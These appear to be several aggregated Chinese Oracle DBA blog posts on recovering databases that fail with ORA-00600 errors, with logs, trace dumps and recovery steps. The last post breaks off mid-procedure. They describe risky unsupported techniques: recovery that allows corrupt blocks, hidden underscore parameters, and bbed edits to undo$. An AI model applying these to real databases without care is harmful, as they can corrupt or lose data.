    uba: 0x01076920.9399.03 ext: 0x34 spc: 0x11a4
    uba: 0x0107691c.9399.14 ext: 0x34 spc: 0x1656
    uba: 0x00000000.9344.19 ext: 0x37 spc: 0x1688
    uba: 0x00000000.bd47.04 ext: 0x5  spc: 0x1d3a
  TRN TBL::

  index  state cflags  wrap#    uel         scn            dba            parent-xid    nub     stmt_num    cmt
  ------------------------------------------------------------------------------------------------
   0x00    9    0x00  0xffffdd12  0x0003  0x0dea.957d661f  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x01    9    0x00  0xffffea71  0x001e  0x0dea.957d65ac  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x02    9    0x00  0xffffecf0  0x0010  0x0dea.957d671d  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   ......
   0x14    9    0x00  0xffffd6de  0x0015  0x0dea.957d65c4  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x15    9    0x00  0xfffff0dd  0x0013  0x0dea.957d65d8  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x16    9    0x00  0xffffd57c  0x0014  0x0dea.957d65c2  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x17    9    0x00  0xffffe5db  0x0002  0x0dea.957d6716  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x18    9    0x00  0xffffee0a  0x0017  0x0dea.957d6710  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x19    9    0x00  0xffffe239  0x0009  0x0dea.957d658d  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1a    9    0x00  0xffffe4d8  0x000a  0x0dea.957d6709  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1b    9    0x00  0xffff5827  0x001a  0x0dea.957d6705  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1c    9    0x00  0xfffff836  0x000e  0x0dea.957d66fb  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1d    9    0x00  0xffffc955  0x000b  0x0dea.957d65b7  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1e    9    0x00  0xffffec64  0x000d  0x0dea.957d65b0  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x1f    9    0x00  0xffffdcd3  0x000f  0x0dea.957d66dc  0x0107691f  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x20    9    0x00  0xffffe4e2  0x001c  0x0dea.957d66e8  0x0107691c  0x0000.000.00000000  0x00000001   0x00000000  1489714986
   0x21    9    0x00  0xfffffff1  0x000c  0x0dea.957d6513  0x0107691b  0x0000.000.00000000  0x00000001   0x00000000  1489714986
  EXT TRN CTL::
  usn: 20
  sp1:0x00000000 sp2:0x00000000 sp3:0x00000000 sp4:0x00000000
  sp5:0x00000000 sp6:0x00000000 sp7:0x00000000 sp8:0x00000000
  EXT TRN TBL::
  index  extflag    extHash    extSpare1   extSpare2
  ---------------------------------------------------
   0x00  0x00000000 0x00000000 0x00000000  0x00000000
   0x01  0x00000000 0x00000000 0x00000000  0x00000000
   ......
   0x1f  0x00000000 0x00000000 0x00000000  0x00000000
   0x20  0x00000000 0x00000000 0x00000000  0x00000000
   0x21  0x00000000 0x00000000 0x00000000  0x00000000
GLOBAL CACHE ELEMENT DUMP (address: 0x700010001ed9618):
  id1: 0x110 id2: 0x4 pkey: INVALID block: (4/272)
  lock: X rls: 0x0 acq: 0x0 latch: 16
  flags: 0x20 fair: 0 recovery: 0 fpin: 'ktuwh72: ktugus:ktuswr1'
  bscn: 0xdea.957d672f bctx: 0x0 write: 0 scan: 0x0
  lcp: 0x0 lnk: [NULL] lch: [0x700010267e80150,0x700010267e80150]
  seq: 686 hist: 145:0 28 340 225 212 72 257 59 334 43 158:0 38
  LIST OF BUFFERS LINKED TO THIS GLOBAL CACHE ELEMENT:
    flg: 0x08200001 state: XCURRENT tsn: 4 tsh: 3
      addr: 0x700010267e80018 obj: INVALID cls: UNDO HEAD bscn: 0xdea.957d672f

从上面整个回滚段头的dump来看,信息确实与redo的内容不匹配,难怪最后会报INVALID block。
对于这个问题,同事说可能是Bug 19700135 : ORA-600 [4187] WHEN WRAP# IS CLOSE TO KSQNMAXVAL。
然而我分析了一下,从现象上来看,并不完全复合。
不管怎么说,从dump 来看这个回滚段并没有任何活动的事务,因此可以通过重建undo或者drop 回滚段的方式来处理这个问题。
最后我通过重建undo表空间之后,观察了10分钟,alert log不再报任何ORA-00600错误。这个小问题在此告一段落。

Related posts:

  1. ORA-01561 & ora-00600 [ktadrprc-1]
  2. win 环境 O/S-Error: (OS 23) 数据错误(循环冗余检查) —恢复
  3. “IPC send timeout error” 导致RAC的节点挂起
  4. ora-00600 [kddummy_blkchk] solution
  5. 15 TB 3节点RAC 的恢复记录

Oracle 9i遭遇ORA-00600 OSDEP_INTERNAL

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: Oracle 9i遭遇ORA-00600 OSDEP_INTERNAL

前几天同事反馈说某客户的一套数据库出现异常,负载极高,服务器几乎无法操作,只能强行关闭服务器电源来重启数据库;悲剧的是重启服务器之后,数据库无法启动了。

首先我们来看看启动数据库报什么错误:

Mon Apr 24 16:28:11 2017
This instance was first to mount
LCK0 started with pid=18, OS id=667902
Mon Apr 24 16:28:15 2017
Successful mount of redo thread 1, with mount id 2877742299
Mon Apr 24 16:28:15 2017
Database mounted in Shared Mode (CLUSTER_DATABASE=TRUE).
Completed: ALTER DATABASE   MOUNT
Mon Apr 24 16:31:14 2017
Errors in file /oracle/app/oracle/admin/jchs07/bdump/jchs07a_smon_516226.trc:
ORA-00601: cleanup lock conflict
Mon Apr 24 16:31:19 2017
SMON: terminating instance due to error 601
Instance terminated by SMON, pid = 516226
Mon Apr 24 16:31:19 2017
Errors in file /oracle/app/oracle/admin/jchs07/bdump/jchs07a_smon_516226.trc:
ORA-00600: internal error code, arguments: [OSDEP_INTERNAL], [], [], [], [], [], [], []
ORA-27302: failure occurred at: skgpwreset1
ORA-27303: additional information: invalid shared ctx
ORA-00601: cleanup lock conflict
Mon Apr 24 16:31:19 2017
Errors in file /oracle/app/oracle/admin/jchs07/bdump/jchs07a_smon_516226.trc:
ORA-07445: exception encountered: core dump [] [] [] [] [] []
ORA-00600: internal error code, arguments: [OSDEP_INTERNAL], [], [], [], [], [], [], []
ORA-27302: failure occurred at: skgpwreset1
ORA-27303: additional information: invalid shared ctx
ORA-00601: cleanup lock conflict

从上述的错误来看,mount之后,open数据库时报错ORA-00601,而且这是SMON进程抛出的错误;可见这是smon进程在进行事务恢复时抛出的错误,最后的结果就是smon强行终止了实例。这就是为什么同事反馈,只要执行alter database open命令,sqlplus 窗口就报错ORA-03113. 如下是对于trace文件的call stack信息:

ORA-00600: internal error code, arguments: [OSDEP_INTERNAL], [], [], [], [], [], [], []
ORA-27302: failure occurred at: skgpwreset1
ORA-27303: additional information: invalid shared ctx
ORA-00601: cleanup lock conflict
----- Call Stack Trace -----
calling              call     entry                argument values in hex
location             type     point                (? means dubious value)
-------------------- -------- -------------------- ----------------------------
ksedmp+0148          bl       ksedst               1029762F4 ?
ksfdmp+0018          bl       01FD5C3C
kgerinv+00e8         bl       _ptrgl
kgerin+003c          bl       kgerinv              BADC0FFEE0DDF00D ?
                                                   BADC0FFEE0DDF00D ?
                                                   BADC0FFEE0DDF00D ?
                                                   BADC0FFEE0DDF00D ?
                                                   FFFFFFFFFFFE830 ?
kgerecoserr+0144     bl       kgerin               110005BA8 ? 110396408 ?
                                                   1029745C4 ? 000000000 ?
                                                   102974480 ? 000000000 ?
                                                   000000000 ? 000000000 ?
ksugprst+0068        bl       kgerecoserr          000000000 ? 102978294 ?
                                                   FFFFFFFFFFFDA48 ?
ksuitm+0790          bl       ksugprst
ksbrdp+0580          bl       ksuitm               000000000 ? 25900000259 ?
opirip+02a8          bl       ksbrdp
opidrv+0300          bl       opirip               9001000A0269318 ? 0101FA7E0 ?
                                                   000000000 ?
sou2o+0028           bl       opidrv               32E0DDF00D ? 0A0059810 ?
                                                   000000000 ?
main+01a4            bl       01FD5650
__start+0090         bl       main                 000000000 ? 000000000 ?

我们继续看后面的几个ORA-错误,我们都知道,对于这种一连串的错误,需要从下往上看,即ORA-00601错误是关键,是起因,然后再导致了ORA-27303,ORA-27302 等等错误。

从错误的基本解释来看,基本上判断是存在锁冲突,数据库都没有open,怎么会有锁呢?所以我们不难看出,这应该是操作系统数据库实例的内存没有清理干净。

果然,我ipcs -a查看看到有几个之前启动过的实例还分配着内存呢,同时也还有一些ora-进程存在。通过ps -ef|grep ora|grep -v grep|awk ‘{print $2}’|xargs kill-9 杀掉进程之后,再ipcrm -m 清除即可。

接着尝试启动数据库,手工进行recover database发现又报其他的错误:

SQL> recover database;
ORA-00283: recovery session canceled due to errors
ORA-10562: Error occurred while applying redo to data block (file# 1, block# 164301)
ORA-10564: tablespace SYSTEM
ORA-01110: data file 1: '/dev/rlv07_2g_sys'
ORA-10561: block type 'TRANSACTION MANAGED INDEX BLOCK', data object# 3
ORA-00607: Internal error occurred while making a change to a data block
ORA-00600: internal error code, arguments: [kcoapl_blkchk], [1], [164301],
[6401], [], [], [], []

这个错误还是比较少见的。最后的这个ORA-00600 [kcoapl_blkchk] 我也是第一次遇到,不过结合前后日志来看,很明显这是数据库在通过redo进行数据块应用时出现了异常,而有异常的数据块则是file 1 block 164301;也就是我们的system 文件。

其次我们也可以看出,该数据块所涉及的对象是data object# 3,也就是我们常说的bootstrap 核心对象,但是这是一个Index。

如果我们再看的仔细一点,可以发现这个块的问题是出在了事务层,因为有ora-10561错误产生。

既然如此,那么我们首先来dbv 检查一下数据库的system文件,看看是否有物理损坏:

jchsdb1:/oracle>dbv file=/dev/rlv07_2g_sys blocksize=8192

DBVERIFY: Release 9.2.0.8.0 - Production on Mon Apr 24 18:13:21 2017

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

DBVERIFY - Verification starting : FILE = /dev/rlv07_2g_sys

DBVERIFY - Verification complete

Total Pages Examined         : 261120
Total Pages Processed (Data) : 90663
Total Pages Failing   (Data) : 0
Total Pages Processed (Index): 58458
Total Pages Failing   (Index): 0
Total Pages Processed (Other): 2011
Total Pages Processed (Seg)  : 0
Total Pages Failing   (Seg)  : 0
Total Pages Empty            : 109988
Total Pages Marked Corrupt   : 0
Total Pages Influx           : 0
Highest block SCN            : 14868719377535 (3461.3837566079)

通过dbv的结果来看,system 文件本身是没有物理损坏的。如果不是物理损坏,那么结合前面的错误信息来看,我们可以判断这个文件的这个块应该是逻辑损坏。这里我们应该可以通过rman 进一步进行检查确认。

为了尽快启动数据库,这里我们先通过如下的方式来尝试进行恢复:

jchsdb1:/oracle>sqlplus "/as sysdba"

SQL*Plus: Release 9.2.0.8.0 - Production on Mon Apr 24 19:22:19 2017

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

Connected to an idle instance.

SQL> startup mount
ORACLE instance started.

Total System Global Area 2568456648 bytes
Fixed Size                   743880 bytes
Variable Size            1493172224 bytes
Database Buffers         1073741824 bytes
Redo Buffers                 798720 bytes
Database mounted.
SQL> RECOVER DATABASE ALLOW 1 CORRUPTION;
Media recovery complete.
SQL> show parameter job

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
job_queue_processes                  integer     10
SQL> alter system set job_queue_processes=0;

System altered.

SQL> alter database open;

Database altered.

很顺利的打开了数据库,这也说明目前数据库的问题并不是很严重,只是有问题的数据块并不多,否则上述的命令是不会起到什么作用的。

这里我简单补充一点,对于allow  n corruption的操作,在Oracle 9i 和10g 版本中,仅仅支持1个corrupt block;而在11gR2版本开始,则可以支持多个,最多可达10个 corrupt block。

打开数据库之后,我检查了数据库alert log发现,有一些其他的错误,如下所示:

ORA-00600: internal error code, arguments: [25012], [0], [852], [], [], [], [], []
Current SQL statement for this session:
INSERT INTO LOG_DB_SIZE_CHANGE SELECT SYSDATE,ROUND(SUM(BYTES)/1024/1024/1024,2) FROM DBA_SEGMENTS GROUP BY SYSDATE
----- PL/SQL Call Stack -----
  object      line  object
  handle    number  name
700000064ab51c0         3  procedure SYSTEM.LOG_TOTAL_DB_SIZE_PRO
700000064ac73a8         1  anonymous block

单纯的看到上述错误,我开始以为是不是因为我们前面执行了allow 1 corruption的恢复,所以导致sql执行报错。

针对该错误,我查询了一下Oracle metalink,其中的文档ORA-600 [25012] “Relative to Absolute File Number Conversion Error” (文档 ID 100073.1) 提到该错误则表示可能是存在物理损坏。其中[0] 表现表空间编号,[852]表示相对文件号。

但是根据实际的情况来看,这似乎不对,因为这个数据库目前仅有200多个数据文件,不太可能出现文件号大于800的情况。其次dbv 检查system文件确实是没有物理损坏。

这里我们姑且不管mos文档是不是对的,就只看这个错误来看,是调用的监控脚本运行出错,监控脚本的本意是通过查询数据库dba_segments试图来获取数据库的大小。

那么我们进一步看看dba_segments的访问是否会涉及到我们前面提到的data object# 3呢? 通过vi trace文件,搜索Plan_table关键字即可看到报错SQL语句的执行计划,我发现并没有涉及到data object# 3的对象。

由此可见,这个数据库除了我们前面提到的data object# 3,还有其他的对象可能也存在逻辑不一致的错误;因此建议进行全库级别的一致性检查,如有必要,建议重建一下数据库。

对于这个问题产生的根本原因,我一直在思考,到底是什么原因呢?最开始我怀疑可能有如下几种可能性原因:

1、强制重启主机,导致主机cache 丢失,最终导致Oracle redo或datafile 存在write lost;

2、数据库的system文件之前就存在不一致的情况

3、Oracle bug

 

由于客户这套Oracle 9208数据库使用的是裸设备,因此Oracle 对于文件的读写按理说是不会应该操作系统cache的,因此不存在第一种情况的说法。所以我认为要么是数据库之前可能就有一定问题要么就是命中了Oracle的某个bug(具体是什么bug,没有去深入排查)。

这里我也提醒一下,对于Oracle 9i这种老库,尤其是非归档的情况,不建议强制重启,可能出现一些异常。

 

Related posts:

  1. ora-00600 [kgeade_is_0]
  2. ora-00600 [kkslgbv0]
  3. About ora-00600 [4400] [48]
  4. ora-00600 [kddummy_blkchk] solution
  5. 非归档遭遇ora-00600 [kcratr_nab_less_than_odr]的恢复

DataBase can’t be open after shutdown immediate

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: DataBase can’t be open after shutdown immediate

五一放假期间,某客户的数据库出现故障,据说对方找了一些工程师折腾了一天,都无法将数据库open,其中参考了网络上的很多文章,也使用了一系列隐含参数,均无法将数据库打开。这里我简单的与大家分享一下这个case。

首先我介绍一下整个case的背景,客户在4月30号凌晨通过shutdown immediate停库维护后,启动数据库无法报错,此时发现数据库无法open,期间尝试了各种数据库手段,均失败告终。我们先来看看相关日志,如下是数据库停库的日志:

Sun Apr 30 02:01:19 2017
Shutting down instance (immediate)
Stopping background process SMCO
Shutting down instance: further logons disabled
Sun Apr 30 02:01:20 2017
Stopping background process CJQ0
Stopping background process QMNC
Stopping background process MMNL
Stopping background process MMON
License high water mark = 262
All dispatchers and shared servers shutdown
Sun Apr 30 02:01:30 2017
ALTER DATABASE CLOSE NORMAL
Sun Apr 30 02:01:30 2017
SMON: disabling tx recovery
SMON: disabling cache recovery
Sun Apr 30 02:01:36 2017
Shutting down archive processes
Archiving is disabled
Sun Apr 30 02:01:36 2017
Sun Apr 30 02:01:36 2017
ARCH shutting downARCH shutting downSun Apr 30 02:01:36 2017

ARCH shutting down

ARC3: Archival stopped
ARC0: Archival stopped
ARC1: Archival stopped
Sun Apr 30 02:01:36 2017
ARCH shutting down
ARC2: Archival stopped
Thread 1 closed at log sequence 138760
Successful close of redo thread 1
Sun Apr 30 02:02:18 2017
Completed: ALTER DATABASE CLOSE NORMAL
ALTER DATABASE DISMOUNT
Shutting down archive processes
Archiving is disabled
Completed: ALTER DATABASE DISMOUNT
ARCH: Archival disabled due to shutdown: 1089
Shutting down archive processes
Archiving is disabled
ARCH: Archival disabled due to shutdown: 1089
Shutting down archive processes
Archiving is disabled
Sun Apr 30 02:02:20 2017
Stopping background process VKTM
Sun Apr 30 02:03:20 2017
Instance shutdown complete

 

 

我们可以看出,这个数据库确实是以shutdown immediate的方式停止的。客户第一次尝试启动时,发现报错ORA-00600 [2663],如下:

Sun Apr 30 02:56:50 2017
ARC3 started with pid=40, OS id=73358
ARC1: Archival started
ARC2: Archival started
ARC1: Becoming the 'no FAL' ARCH
ARC1: Becoming the 'no SRL' ARCH
ARC2: Becoming the heartbeat ARCH
Thread 1 opened at log sequence 138760
  Current log# 5 seq# 138760 mem# 0: /opt/oracle/oradata/jddb/redo05.log
Successful open of redo thread 1
MTTR advisory is disabled because FAST_START_MTTR_TARGET is not set
SMON: enabling cache recovery
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73336.trc  (incident=384297):
ORA-00600: internal error code, arguments: [2663], [0], [2081888970], [0], [2081892886], [], [], [], [], [], [], []
Incident details in: /opt/oracle/diag/rdbms/jddb/jddb/incident/incdir_384297/jddb_ora_73336_i384297.trc
ARC3: Archival started
ARC0: STARTING ARCH PROCESSES COMPLETE
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
Undo initialization errored: err:600 serial:0 start:1909462874 end:1909464654 diff:1780 (17 seconds)
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73336.trc:
ORA-00600: internal error code, arguments: [2663], [0], [2081888970], [0], [2081892886], [], [], [], [], [], [], []
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73336.trc:
ORA-00600: internal error code, arguments: [2663], [0], [2081888970], [0], [2081892886], [], [], [], [], [], [], []
Error 600 happened during db open, shutting down database
USER (ospid: 73336): terminating the instance due to error 600
Instance terminated by USER, pid = 73336
ORA-1092 signalled during: ALTER DATABASE OPEN...
opiodr aborting process unknown ospid (73336) as a result of ORA-1092

 

 

这是一个非常常见的错误,这个错误通常是是更数据块有关系。我们知道,根据经验,一般来讲,如果current scn (这里是scn base)与dependent scn(scn base)非常接近(且scn wrap都一致或者为0)的情况下,说明scn的差异非常小,通过多次重启数据库的手段,基本上可以绕过这个错误。果然,通过看客户提供的alert log发现多次重启后,alert log的报错日志变了ORA-00600 [4194]错误,如下:

Recovery of Online Redo Log: Thread 1 Group 1 Seq 138761 Reading mem 0
  Mem# 0: /opt/oracle/oradata/jddb/redo01.log
Block recovery completed at rba 138761.5.16, scn 0.2081908976
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73923.trc:
ORA-00600: internal error code, arguments: [4194], [], [], [], [], [], [], [], [], [], [], []
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_73923.trc:
ORA-00600: internal error code, arguments: [4194], [], [], [], [], [], [], [], [], [], [], []
Error 600 happened during db open, shutting down database
USER (ospid: 73923): terminating the instance due to error 600
Instance terminated by USER, pid = 73923
ORA-1092 signalled during: ALTER DATABASE OPEN...
opiodr aborting process unknown ospid (73923) as a result of ORA-1092

 

 

这是一个看似非常简单的错误,大致意思是说Oracle 在进行事务恢复时发现redo和undo的信息有所出入,因此抛出这个错误。这里我仍然贴出Oracle MOS的标准解释供大家参考:Basic Steps to be Followed While Solving ORA-00600 [4194]/[4193] Errors Without Using Unsupported parameter (文档 ID 281429.1)

Format: ORA-600 [4194] [a] [b]

VERSIONS:
  versions 6.0 to 12.1 

DESCRIPTION:

  A mismatch has been detected between Redo records and rollback (Undo)
  records.

  We are validating the Undo record number relating to the change being
  applied against the maximum undo record number recorded in the undo block.

  This error is reported when the validation fails.

ARGUMENTS:
  Arg [a] Maximum Undo record number in Undo block
  Arg [b] Undo record number from Redo block

FUNCTIONALITY:
  Kernel Transaction Undo called from Cache layer

IMPACT:
  PROCESS FAILURE
  POSSIBLE ROLLBACK SEGMENT CORRUPTION

SUGGESTIONS:

  This error may indicate a rollback segment corruption.

  This may require a recovery from a database backup depending on
  the situation.

  If the Known Issues section below does not help in terms of identifying
  a solution, please submit the trace files and alert.log to Oracle
  Support Services for further analysis.

上述文档中提到,这个错误其实就是指恢复时发现undo block对应的record 编号与redo block 对应的undo record 编号不一致。通常情况下来讲,都是由于回滚段损坏导致的问题。 这里我们先不去进行alert log的详细分析展开了,以自己的实际操作过程来进行展开分析说明。如下是我的简单恢复过程。

首先我尝试进行正常恢复,并打开数据库:

SQL> recover database using backup controlfile until cancel;
ORA-00279: change 2082649195 generated at 04/30/2017 12:53:07 needed for thread 1
ORA-00289: suggestion : /opt/oraarch/1_138798_924909160.dbf
ORA-00280: change 2082649195 for thread 1 is in sequence #138798

Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
/opt/oracle/oradata/jddb/redo03.log
Log applied.
Media recovery complete.
SQL>
SQL> alter database open resetlogs;
alter database open resetlogs
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel
Process ID: 44134
Session ID: 397 Serial number: 3

我们可以看到操作报错,并没有打开数据库。此时查看数据库alert 告警日志,发现正是前面提到的ORA-00600 [4194]错误:

Sun Apr 30 21:01:05 2017
SMON: enabling cache recovery
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_44134.trc  (incident=840297):
ORA-00600: internal error code, arguments: [4194], [rch/1_138795_924909160.dbft/oraarch/1_138798_924909160.dbf
Incident details in: /opt/oracle/diag/rdbms/jddb/jddb/incident/incdir_840297/jddb_ora_44134_i840297.trc
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
ARC3: Archival started
ARC0: STARTING ARCH PROCESSES COMPLETE
Block recovery from logseq 1, block 3 to scn 2082649208
Recovery of Online Redo Log: Thread 1 Group 1 Seq 1 Reading mem 0
  Mem# 0: /opt/oracle/oradata/jddb/redo01.log
Block recovery stopped at EOT rba 1.5.16
Block recovery completed at rba 1.5.16, scn 0.2082649206
Block recovery from logseq 1, block 3 to scn 2082649205
Recovery of Online Redo Log: Thread 1 Group 1 Seq 1 Reading mem 0
  Mem# 0: /opt/oracle/oradata/jddb/redo01.log
Block recovery completed at rba 1.5.16, scn 0.2082649206
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_44134.trc:
ORA-00600: internal error code, arguments: [4194], [rch/1_138795_924909160.dbft/oraarch/1_138798_924909160.dbf
], [], [], [], [], [], [], [], [], [], []
Errors in file /opt/oracle/diag/rdbms/jddb/jddb/trace/jddb_ora_44134.trc:
ORA-00600: internal error code, arguments: [4194], [rch/1_138795_924909160.dbft/oraarch/1_138798_924909160.dbf
], [], [], [], [], [], [], [], [], [], []
Error 600 happened during db open, shutting down database
USER (ospid: 44134): terminating the instance due to error 600
Instance terminated by USER, pid = 44134

这个ora-00600 错误与前面提到的完全一致。根据我们常规处理这个错误的套路,基本上就是使用undo_management=’manual’ 来尝试绕过,经过测试发现不好使。进一步查看对应的trace 文件,发现oracle提示说某个块存在异常:

Error 600 in redo application callback
Dump of change vector:
TYP:0 CLS:16 AFN:1 DBA:0x00400083 OBJ:4294967295 SCN:0x0000.7c172a16 SEQ:11 OP:5.1 ENC:0 RBL:0
ktudb redo: siz: 268 spc: 7602 flg: 0x0012 seq: 0x0024 rec: 0x03
            xid:  0x0000.03f.00000023
ktubl redo: slt: 63 rci: 0 opc: 11.1 [objn: 15 objd: 15 tsn: 0]
Undo type:  Regular undo        Begin trans    Last buffer split:  No
Temp Object:  No
Tablespace Undo:  No
             0x00000000  prev ctl uba: 0x00400084.0024.20
prev ctl max cmt scn:  0x0000.70105e77  prev tx cmt scn:  0x0000.70105e79
txn start scn:  0xffff.ffffffff  logon user: 0  prev brb: 4194863  prev bcl: 0 BuExt idx: 0 flg2: 0
KDO undo record:
KTB Redo
op: 0x04  ver: 0x01
compat bit: 4 (post-11) padding: 1
op: L  itl: xid:  0x0000.03d.00000023 uba: 0x00400084.0024.1e
                      flg: C---    lkc:  0     scn: 0x0000.7c171ac6
KDO Op code: URP row dependencies Disabled
  xtype: XA flags: 0x00000000  bdba: 0x004000e1  hdba: 0x004000e0
itli: 1  ispac: 0  maxfr: 4863
tabn: 0 slot: 1(0x1) flag: 0x2c lock: 0 ckix: 0
ncol: 17 nnew: 12 size: 0
col  1: [20]  5f 53 59 53 53 4d 55 31 5f 33 37 32 34 30 30 34 36 30 36 24
col  2: [ 2]  c1 02
col  3: [ 2]  c1 04
col  4: [ 3]  c2 02 1d
col  5: [ 6]  c5 15 52 59 59 51
col  6: [ 1]  80
col  7: [ 4]  c3 11 5b 25
col  8: [ 3]  c3 03 08
col  9: [ 1]  80
col 10: [ 2]  c1 04
col 11: [ 2]  c1 03
col 16: [ 2]  c1 03
Block after image is corrupt:
buffer tsn: 0 rdba: 0x00400083 (1/131)
scn: 0x0000.7c172a16 seq: 0x0b flg: 0x04 tail: 0x2a16020b
frmt: 0x02 chkval: 0x205f type: 0x02=KTU UNDO BLOCK

上述的错误其实也很容易解释,简单的讲就是redo应用时出现了异常,而且oracle 明确提升file 1 block 131 这个undo block有问题. 上述的内容是redo block的dump;那么我们来看看对应的undo block 中的前镜像是什么:

*-----------------------------
* Rec #0x3  slt: 0x3f  objn: 15(0x0000000f)  objd: 15  tblspc: 0(0x00000000)
*       Layer:  11 (Row)   opc: 1   rci 0x00
Undo type:  Regular undo    Begin trans    Last buffer split:  No
Temp Object:  No
Tablespace Undo:  No
rdba: 0x00000000Ext idx: 0
flg2: 0
*-----------------------------
uba: 0x00400084.0024.20 ctl max scn: 0x0000.70105e77 prv tx scn: 0x0000.70105e79
txn start scn: scn: 0x0000.7c171acb logon user: 0
 prev brb: 4194863 prev bcl: 0
KDO undo record:
KTB Redo
op: 0x04  ver: 0x01
compat bit: 4 (post-11) padding: 1
op: L  itl: xid:  0x0000.03d.00000023 uba: 0x00400084.0024.1e
                      flg: C---    lkc:  0     scn: 0x0000.7c171ac6
KDO Op code: URP row dependencies Disabled
  xtype: XA flags: 0x00000000  bdba: 0x004000e1  hdba: 0x004000e0
itli: 1  ispac: 0  maxfr: 4863
tabn: 0 slot: 10(0xa) flag: 0x2c lock: 0 ckix: 0
ncol: 17 nnew: 12 size: 0
col  1: [21]
 5f 53 59 53 53 4d 55 31 30 5f 31 31 39 37 37 33 34 39 38 39 24
col  2: [ 2]  c1 02
col  3: [ 2]  c1 04
col  4: [ 3]  c2 03 49
col  5: [ 6]  c5 15 52 59 5a 0a
col  6: [ 1]  80
col  7: [ 4]  c3 21 40 24
col  8: [ 4]  c3 04 06 33
col  9: [ 1]  80
col 10: [ 2]  c1 03
col 11: [ 2]  c1 03
col 16: [ 2]  c1 03

我们可以看到完全不匹配,同时我们通过脚本将上述内容进行转换,可以发现是其实是回滚段名称:

www.killdb.com@ SELECT F_GET_FROM_DUMP('5f,53,59,53,53,4d,55,32,5f,32,39,39,36,33,39,31,33,33,32,24','VARCHAR2') GET_DUMP
  2  from dual;

GET_DUMP
--------------------------------------------------------------------------------------------------------------------------
_SYSSMU2_2996391332$

www.killdb.com@ SELECT F_GET_FROM_DUMP('5f,53,59,53,53,4d,55,31,30,5f,31,31,39,37,37,33,34,39,38,39,24','VARCHAR2') GET_DUMP
  2  from dual;

GET_DUMP
--------------------------------------------------------------------------------------------------------------------------
_SYSSMU10_1197734989$

其次结合我们前面解释ora-00600  [4194]错误来看,这里undo block 对应的record number是0×20,而redo block中记录的record number是0×2. 这确实是不匹配的。

那么怎么解决这个问题呢? 能不能通过屏蔽回滚段的方式来解决呢?我尝试在open之前设置10046 trace,来观察了一下得到了如下结果:

update /*+ rule */ undo$ set name=:2,file#=:3,block#=:4,status$=:5,user#=:6,undosqn=:7,xactsqn=:8,scnbas=:9,scnwrp=:10,inst#=:11,ts#=:12,spare1=:13 where us#=:1
END OF STMT
PARSE #140333533666600:c=4999,e=4974,p=8,cr=62,cu=0,mis=1,r=0,dep=1,og=3,plh=0,tim=1493558803488842
BINDS #140333533666600:
 Bind#0
  oacdty=01 mxl=32(20) mxlc=00 mal=00 scl=00 pre=00
  oacflg=18 fl2=0001 frm=01 csi=871 siz=32 off=0
  kxsbbbfp=281ff02342  bln=32  avl=20  flg=09
  value="_SYSSMU1_3724004606$"
 Bind#1
  oacdty=02 mxl=22(22) mxlc=00 mal=00 scl=00 pre=00
  oacflg=08 fl2=0001 frm=00 csi=00 siz=24 off=0
  kxsbbbfp=7fa1f26dc788  bln=24  avl=02  flg=05
  value=3
......
WAIT #140333533666600: nam='db file sequential read' ela= 12 file#=1 block#=131 blocks=1 obj#=0 tim=1493558803489767
......
Incident 864297 created, dump file: /opt/oracle/diag/rdbms/jddb/jddb/incident/incdir_864297/jddb_ora_49305_i864297.trc
ORA-00600: internal error code, arguments: [4194], [rch/1_1_942699661.dbfcceeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '/opt/oracle/oradata/jddb/system01.dbf
可以看到oracle在执行update  undo$时报错,其中更新的是_SYSSMU1_3724004606$ 这个回滚段。而且我们也可以看到,wait# 中记录的正好是前面
报错的file# 1 block 131. 那么通过_corrupted_rollback_segments=(_SYSSMU1_3724004606$)这种方式是否可以解决这个问题呢?
很遗憾,这里我测试也不行。甚至通过bbed 修改undo$的kdbr记录,将_SYSSMU1 的状态修改为offline,也无法绕过这个ora-00600 4194错误。
简直堪称最顽固的ORA-00600 [4194]。
我又检查了一下前面的trace文件,发现所针对这个回滚段头的dump记录,可以确认其中并没有什么活动事务。
然后再仔细看我们所遇到的这个ora-00600 [4194]错误,我感觉有点怪异。为什么说怪异呢?
如果说根据Oracle mos的解释文档来看,这里是是没有[a],[b] 值的,因为均为0.
最后我们想到通过修改system 回滚段头来绕过这个错误,如下是操作过程:
